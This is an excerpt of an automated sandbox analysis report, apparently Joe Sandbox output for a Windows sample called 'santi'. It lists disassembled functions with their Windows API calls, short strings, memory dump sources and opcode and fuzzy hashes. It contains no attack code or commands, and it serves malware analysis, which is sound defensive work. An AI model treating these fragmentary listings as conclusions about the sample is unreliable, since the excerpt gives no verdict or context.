                                                                • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                • Instruction Fuzzy Hash: 8C410831900236BACF36EF99E841AFEB770EF18710F55505AF981AB191DB305E92C760
                                                                Function 002FBCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNEL32(00000000), ref: 002FBCDA
                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 002FBCF3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: GlobalMemorySleepStatus
                                                                • String ID: @
                                                                • API String ID: 2783356886-2766056989
                                                                • Opcode ID: 9944fb33b3fa34e9297ce24868504a8c8578e1f38578600624ef98e5cd15460d
                                                                • Instruction ID: 3e3d9d5410126d17101067c1b1e1617a12f14a497784d23c10c396dc61b65ca1
                                                                • Opcode Fuzzy Hash: 9944fb33b3fa34e9297ce24868504a8c8578e1f38578600624ef98e5cd15460d
                                                                • Instruction Fuzzy Hash: 2C513971418748DBE320AF14D886BAFBBECFB95394F41485EF2C8420A2DF71956C8B56
                                                                Function 0032C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002E44ED: __fread_nolock.LIBCMT ref: 002E450B
                                                                • _wcscmp.LIBCMT ref: 0032C65D
                                                                • _wcscmp.LIBCMT ref: 0032C670
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscmp$__fread_nolock
                                                                • String ID: FILE
                                                                • API String ID: 4029003684-3121273764
                                                                • Opcode ID: a520db34d5510299fdc72f8390cf3d437987223a1acf3091125a5d7a29789564
                                                                • Instruction ID: e81df860063b1b2fd8d22ad7ff809c5fde77be7162202ec2bf3c440a5fae9175
                                                                • Opcode Fuzzy Hash: a520db34d5510299fdc72f8390cf3d437987223a1acf3091125a5d7a29789564
                                                                • Instruction Fuzzy Hash: 0341F372A0025ABBDF21ABA4DC42FEF77B9AF49700F001069F605FB181D770AA04CB60
                                                                Function 0034A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0034A85A
                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0034A86F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: '
                                                                • API String ID: 3850602802-1997036262
                                                                • Opcode ID: e310fd039d9193d20b51b26e416c0d296a9a1030401400c5a1a93167240334b4
                                                                • Instruction ID: 6345be16b0ab7c2ec0523760b87d6926217ccb8507a9a0ee1f61e60b6475aeff
                                                                • Opcode Fuzzy Hash: e310fd039d9193d20b51b26e416c0d296a9a1030401400c5a1a93167240334b4
                                                                • Instruction Fuzzy Hash: 9341F575E406099FDB15CFA8C880BDABBF9FB09300F15006AE905EB391D770A942CFA1
                                                                Function 0034975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DestroyWindow.USER32(?,?,?,?), ref: 0034980E
                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0034984A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$DestroyMove
                                                                • String ID: static
                                                                • API String ID: 2139405536-2160076837
                                                                • Opcode ID: 23f5935ef7f6e13af646252f383150b4393787551597944701f152c725bba3cb
                                                                • Instruction ID: 7479328e2c727790611b04388a8e3b09eefc7781cdd46507e7985b72bedd12b3
                                                                • Opcode Fuzzy Hash: 23f5935ef7f6e13af646252f383150b4393787551597944701f152c725bba3cb
                                                                • Instruction Fuzzy Hash: 4C319E71110204AAEB119F38CC81BFB77ADFF59760F01861AF9A9CB190CA71AC91CB60
                                                                Function 00325157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 003251C6
                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00325201
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: InfoItemMenu_memset
                                                                • String ID: 0
                                                                • API String ID: 2223754486-4108050209
                                                                • Opcode ID: 1da1c426bbc042b80db68d945da0ff50837643b3078e7ef25cb4feec799a4b92
                                                                • Instruction ID: beaafc09c7eb960a4f641f56fa33439a005cb138d95c067bc267f24b551afdb0
                                                                • Opcode Fuzzy Hash: 1da1c426bbc042b80db68d945da0ff50837643b3078e7ef25cb4feec799a4b92
                                                                • Instruction Fuzzy Hash: AD31D831600724EBEB2ACF99E945BAEBBF8FF45350F154829E985E61E0D7709B44CB10
                                                                Function 0033658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __snwprintf
                                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                                • API String ID: 2391506597-2584243854
                                                                • Opcode ID: 6bb02ad9875adcc39f6ecd58f230ba018ab0e88bc13b43b461657d42849a9105
                                                                • Instruction ID: 643490a74afeb7072010aee881b531a7f7e4beb4c6f8f9c98b30bce8e516d51a
                                                                • Opcode Fuzzy Hash: 6bb02ad9875adcc39f6ecd58f230ba018ab0e88bc13b43b461657d42849a9105
                                                                • Instruction Fuzzy Hash: 8721AD71650218BFCF16EFA5C883EEE73B4AF48344F504469F505AB181DB70EA65CBA1
                                                                Function 003493CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0034945C
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00349467
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: Combobox
                                                                • API String ID: 3850602802-2096851135
                                                                • Opcode ID: cff0396042147d61c16589e848f942b4233caf645f1ae7d6fcc663c82bf44f46
                                                                • Instruction ID: 7d14bb84ef50c647555ffc04206c5909f8d0d821932b9898dcbdeeef6c884b5b
                                                                • Opcode Fuzzy Hash: cff0396042147d61c16589e848f942b4233caf645f1ae7d6fcc663c82bf44f46
                                                                • Instruction Fuzzy Hash: 031198717101086FEF12DF55DC81FBB37AFEB493A4F114126F9199B2A0D671AC528760
                                                                Function 0034DA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • GetActiveWindow.USER32 ref: 0034DA7B
                                                                • EnumChildWindows.USER32(?,0034D75F,00000000), ref: 0034DAF5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$ActiveChildEnumLongWindows
                                                                • String ID: T13
                                                                • API String ID: 3814560230-3984144858
                                                                • Opcode ID: b9b389875d2ee226f81c41e4bfb40476b9ba3af16d455206a8449a1d3ad3cecc
                                                                • Instruction ID: 98b8f6e1e2fa2833bd4366b4323d8b1d391b2e08de9387aca39aef702d51fe2a
                                                                • Opcode Fuzzy Hash: b9b389875d2ee226f81c41e4bfb40476b9ba3af16d455206a8449a1d3ad3cecc
                                                                • Instruction Fuzzy Hash: 14211B79604205DFC716DF28D854AA6B7E9EB5A320F290619F966CB3E0D730B810CF60
                                                                Function 003498FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002FD1BA
                                                                  • Part of subcall function 002FD17C: GetStockObject.GDI32(00000011), ref: 002FD1CE
                                                                  • Part of subcall function 002FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 002FD1D8
                                                                • GetWindowRect.USER32(00000000,?), ref: 00349968
                                                                • GetSysColor.USER32(00000012), ref: 00349982
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                • String ID: static
                                                                • API String ID: 1983116058-2160076837
                                                                • Opcode ID: 2b3cbd7eaeb71569c59f93e3328de09afa50c207ee0d806437248aacec34e68a
                                                                • Instruction ID: 6b9eb78c0942693a0b59ed223cd4f7f9adfe280d884542b12a8878a452cabbfd
                                                                • Opcode Fuzzy Hash: 2b3cbd7eaeb71569c59f93e3328de09afa50c207ee0d806437248aacec34e68a
                                                                • Instruction Fuzzy Hash: 5B11297262020AAFDB05DFB8CC45AEA7BA8FB08354F014629F956E6250D774E851DB60
                                                                Function 00349617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowTextLengthW.USER32(00000000), ref: 00349699
                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003496A8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: LengthMessageSendTextWindow
                                                                • String ID: edit
                                                                • API String ID: 2978978980-2167791130
                                                                • Opcode ID: 184117096bf8eea2ce3e8813d433eed8024a3dd8f1ac756e710d3f49ea809d0b
                                                                • Instruction ID: cc847bcf545ddc737344f041a8f8af308204ac412d9ebb79cb77b9f8ba3fba4f
                                                                • Opcode Fuzzy Hash: 184117096bf8eea2ce3e8813d433eed8024a3dd8f1ac756e710d3f49ea809d0b
                                                                • Instruction Fuzzy Hash: 2611BF71500108ABEB225F64DC44FEB37AEEB05378F124315F9259B1E0C779EC509B60
                                                                Function 00325262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 003252D5
                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003252F4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: InfoItemMenu_memset
                                                                • String ID: 0
                                                                • API String ID: 2223754486-4108050209
                                                                • Opcode ID: 7260a401e2c97feb81be7b18ade71143eadb4c0862016bf0831db4740fbad390
                                                                • Instruction ID: bd43714d6bac1ddaeae6c9b17ea272ef512d9caaa2056dce36ad410a1f37b4b7
                                                                • Opcode Fuzzy Hash: 7260a401e2c97feb81be7b18ade71143eadb4c0862016bf0831db4740fbad390
                                                                • Instruction Fuzzy Hash: F311937A901734EBDB12DA98E944B9D77BCAB06790F160015EA91A7190D3B0EE04C7A1
                                                                Function 00334D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00334DF5
                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00334E1E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Internet$OpenOption
                                                                • String ID: <local>
                                                                • API String ID: 942729171-4266983199
                                                                • Opcode ID: d3b03cfa4e421f96be988b3d76051e1066482f0d94cedf0ae734e4f2c0fb5c25
                                                                • Instruction ID: 2a57905ce762989bf3f5b99bc6b48ace0a84e5d010400119a15b6ecd98639e96
                                                                • Opcode Fuzzy Hash: d3b03cfa4e421f96be988b3d76051e1066482f0d94cedf0ae734e4f2c0fb5c25
                                                                • Instruction Fuzzy Hash: ED117CB0605221BBDB268F61C8D9EFBFBACFF16755F10822AF51596540D3B06990C6E0
                                                                Function 0030A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003137A7
                                                                • ___raise_securityfailure.LIBCMT ref: 0031388E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                • String ID: (:
                                                                • API String ID: 3761405300-3132975541
                                                                • Opcode ID: e0f2382ec1aff8383438964c895b7c9775991a466cdb8b8961e7a5a5a5bf4fab
                                                                • Instruction ID: 9abeb8b1b1d5e7c5bb5c6434c074bd46a57433651a2692c5a48090007f7f0fa6
                                                                • Opcode Fuzzy Hash: e0f2382ec1aff8383438964c895b7c9775991a466cdb8b8961e7a5a5a5bf4fab
                                                                • Instruction Fuzzy Hash: 8C2107B5541B04DAD74EDF65F995A407BF8BB4E310F10982AE5048B3A0E3F16980EF86
                                                                Function 0033A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0033A84E
                                                                • htons.WSOCK32(00000000,?,00000000), ref: 0033A88B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: htonsinet_addr
                                                                • String ID: 255.255.255.255
                                                                • API String ID: 3832099526-2422070025
                                                                • Opcode ID: ff5393fc570f1a95a4f2f86b43966137dff1e04a4829eb9c4329367fbeaf1062
                                                                • Instruction ID: 2f58d6eb2cbc17bd9491626018afc977c2c082700fb803cebb881ca6ffbfd964
                                                                • Opcode Fuzzy Hash: ff5393fc570f1a95a4f2f86b43966137dff1e04a4829eb9c4329367fbeaf1062
                                                                • Instruction Fuzzy Hash: EE01F575600304ABCB229F68C8C6FEDB768EF44314F10852AF556AF2D1D772E802C752
                                                                Function 0031B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0031B7EF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 3850602802-1403004172
                                                                • Opcode ID: 08074ff674f518ecc139e1cc377e8ac01b044fb5345c456fc2f67cf9be8f610e
                                                                • Instruction ID: 786a0b6e7c5400bc2f28e69136978e3a35d2474b3070ae3bab4cf17d898091dc
                                                                • Opcode Fuzzy Hash: 08074ff674f518ecc139e1cc377e8ac01b044fb5345c456fc2f67cf9be8f610e
                                                                • Instruction Fuzzy Hash: 8E014771650154ABCB0AEBA8CC42DFE736EBF0A310B54061CF462672C2EF7058188BA0
                                                                Function 0031B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 0031B6EB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 3850602802-1403004172
                                                                • Opcode ID: 1d233f52a0aff074bfc7dabab6346c54166edbda8b3cd98fd42817776d0ded05
                                                                • Instruction ID: 52eebe6053549d4593c1de9adf43437256c0713124e5813573cc6124522ff128
                                                                • Opcode Fuzzy Hash: 1d233f52a0aff074bfc7dabab6346c54166edbda8b3cd98fd42817776d0ded05
                                                                • Instruction Fuzzy Hash: 1A01A271A81004ABCB0AEBA5C952AFF73AD9F1A344F64001DF402B7281DF945E298BB5
                                                                Function 0031B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 0031B76C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 3850602802-1403004172
                                                                • Opcode ID: 922b97fa98ec51859a6bda6993689597aaa1322f1d0106e883e068b8e6b18d59
                                                                • Instruction ID: 520abbd76c792431b5623d27a66abb2bb74f32f6362107fefc598157878bfc88
                                                                • Opcode Fuzzy Hash: 922b97fa98ec51859a6bda6993689597aaa1322f1d0106e883e068b8e6b18d59
                                                                • Instruction Fuzzy Hash: FF018675681104BBDB0AE7A4C952EFF73AD9F0A344F640019F401B32D2DB645E598BB5
